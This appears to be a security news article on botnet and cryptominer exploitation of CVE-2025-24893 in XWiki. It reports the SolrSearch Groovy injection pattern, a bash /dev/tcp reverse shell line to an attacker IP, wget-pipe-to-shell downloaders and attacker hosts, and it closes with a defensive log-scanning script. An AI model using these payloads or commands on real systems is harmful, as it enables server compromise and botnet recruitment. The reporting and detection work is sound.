Saturday, February 14, 2026

Hackers Exploiting XWiki Vulnerability To Recruit Servers For Botnet Operations

Cybersecurity researchers have observed a surge in attacks targeting CVE-2025-24893, a critical remote code execution flaw in the XWiki platform.

This vulnerability allows unauthenticated attackers to inject and execute arbitrary Groovy code via the SolrSearch macro, enabling full server compromise.

Since its addition to CISA’s Known Exploited Vulnerabilities catalog on October 30, 2025, exploitation has expanded rapidly, with botnets like RondoDox now using it to recruit servers for malicious operations.

Early detection tools, such as VulnCheck Canaries, have captured these attempts, revealing diverse threat actors ranging from coin miners to custom scanners.

Defenders must prioritize patching to prevent widespread botnet growth.

| CVE ID | Description | CVSS Score | Affected Versions | Exploitation Status |
|---|---|---|---|---|
| CVE-2025-24893 | Unauthenticated remote code execution via SolrSearch macro allowing arbitrary Groovy code injection in XWiki Platform. | 9.8 (Critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | XWiki 5.3-milestone-2 to 15.10.10; 16.0.0-rc-1 to 16.4.0. Fixed in 15.10.11, 16.4.1, 16.5.0RC1. | Actively exploited in the wild since October 2025 by botnets like RondoDox for server recruitment. |
| CVE-2023-47218 | OS command injection vulnerability in QNAP operating systems allowing unauthenticated command execution over the network. | 5.8 (Medium) CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L | QTS before 5.1.5.2645 build 20240116; QuTS hero before h5.1.5.2647; QuTScloud before c5.1.5.2651. | |

Increased Exploitation Activity

Exploitation of CVE-2025-24893 began in late October 2025, with VulnCheck Canaries detecting initial attacks on internet-exposed XWiki servers.

The flaw is fixed in versions 15.10.11, 16.4.1, and 16.5.0RC1; against unpatched instances, attackers craft HTTP GET requests to the “/xwiki/bin/get/Main/SolrSearch” endpoint.

These requests embed Groovy code in the “text” parameter, bypassing authentication by closing Velocity template tags with “%7D%7D” and injecting payloads like “{{async async=false}}{{groovy}}”.

For instance, a typical exploit payload decodes to commands that download secondary scripts via wget or curl.

Activity spiked after November 3, 2025, when RondoDox integrated the vulnerability into its arsenal. RondoDox, a botnet first documented in July 2025, now targets over 650 exploits across devices.

Its attacks use a distinctive User-Agent, “Mozilla/5.0 (bang2013@atomicmail.io)”, and payloads such as “rondo.sdu.sh,” hosted on IPs including 74.194.191.52.

A captured request from IP 45.153.34.156 shows base64-encoded Groovy code executing “wget -qO | sh”, pulling a downloader that installs the botnet for DDoS or cryptomining. This two-stage chain writes files to disk before execution, evading basic detection.

Other actors include coin miners deploying payloads from obfuscated URLs.

On November 7, 2025, IP 172.245.241.123 fetched a base64-encoded script from ospwrf10ny.anondns.net, which was decoded into a bash function that curls additional miners with the hash 03a77a556f074184b254d90e13cdd3a31efaa5a77640405e5f78aa462736acf7.

Another attack from 156.146.56.131 used python-requests to curl “setup_runnv_miner.sh” from 47.236.194.231:81, saving it as /tmp/123.sh for later execution.

These miners consume server resources, turning compromised XWiki instances into cryptojacking nodes.

Reverse shell attempts further highlight targeted threats. On October 31, 2025, AWS IP 18.228.3.224 tried a BusyBox nc reverse shell to itself on port 8443, suggesting manual reconnaissance.

Later, on November 11, 118.99.141.178, a potentially exploited QNAP host vulnerable to CVE-2023-47218, attempted a bash reverse shell to 155.138.212.170:9001 using “/bin/bash -i >& /dev/tcp/155.138.212.170/9001 0>&1”.

The QNAP flaw enables command injection, amplifying risks when chained with XWiki exploits.

Botnet Recruitment Tactics

RondoDox’s recruitment via CVE-2025-24893 exemplifies botnet evolution, with steady growth since November 3.

The botnet’s downloader fetches modular payloads, enabling DDoS amplification or proxying.

VulnCheck data from October 28 to November 11 shows over 100 unique exploit signatures, including OAST probes, Fun and Nuclei scans dumping /etc/passwd via “cat /etc/passwd”, and non-standard probes such as “id” or “EXPLOIT_SUCCESS” that indicate custom tooling.

An actor from the initial exploitation report expanded to new IPs, including 172.206.196.45, and to hosts at 185.142.33.151, downloading x86-64 binaries to /tmp/f1c5f.

This diversity, from automated botnets to hands-on attacks, underscores the vulnerability’s appeal for initial access. XWiki, used for enterprise wikis, often runs on exposed ports, amplifying risk.

Patching remains critical, as exploitation precedes broad awareness. Tools like VulnCheck’s Canary Intelligence offer early visibility, blocking attacks before compromise.

Organizations should scan for exposed XWiki instances and monitor for Groovy injections in logs.
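As an added example (not code from the article or from VulnCheck), the check below turns the request pattern described earlier (GET to the SolrSearch endpoint with “%7D%7D” and “{{async async=false}}{{groovy}}” in the “text” parameter, and the RondoDox User-Agent) into a scan over web server access logs, which is the log monitoring the sentence above recommends. The log lines are constructed for the demonstration; only the endpoint, the payload markers and the User-Agent string come from the article.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed sample access-log lines (combined log format). IPs, timestamps and
# sizes are made up; the endpoint, payload markers and User-Agent are from the article.
SAMPLE_LOG = """\
203.0.113.10 - - [03/Nov/2025:10:15:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7DPAYLOAD%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
198.51.100.7 - - [03/Nov/2025:10:16:44 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=kubernetes HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.5 - - [03/Nov/2025:10:17:03 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 9001 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Markers of the injection described in the article, matched after URL-decoding:
# the closing "}}" used to break out of the Velocity template, then the macro openers.
INJECTION_MARKERS = ("}}{{", "{{groovy}}", "{{async")
RONDODOX_UA = "Mozilla/5.0 (bang2013@atomicmail.io)"


def analyze_line(line):
    """Return the reasons a request looks like CVE-2025-24893 exploitation ([] if clean)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []  # not a combined-format line; skip rather than guess
    reasons = []
    url = urlparse(m.group("target"))
    if url.path.endswith("/bin/get/Main/SolrSearch"):
        text = " ".join(parse_qs(url.query).get("text", []))
        decoded = unquote(text)  # parse_qs decoded once; a second pass catches double encoding
        if any(marker in decoded for marker in INJECTION_MARKERS):
            reasons.append("groovy-injection-in-text-param")
    if m.group("ua") == RONDODOX_UA:
        reasons.append("rondodox-user-agent")
    return reasons


def scan_log(text):
    """Map each flagged source IP to the list of reasons its requests were flagged."""
    hits = {}
    for line in text.splitlines():
        reasons = analyze_line(line)
        if reasons:
            ip = LOG_RE.match(line.strip()).group("ip")
            hits.setdefault(ip, []).extend(reasons)
    return hits


if __name__ == "__main__":
    for ip, reasons in scan_log(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```

A hit on the injection marker is worth triaging even when the User-Agent is generic, since only RondoDox uses the distinctive one; the many other actors described above do not.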

Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging threats and technologies.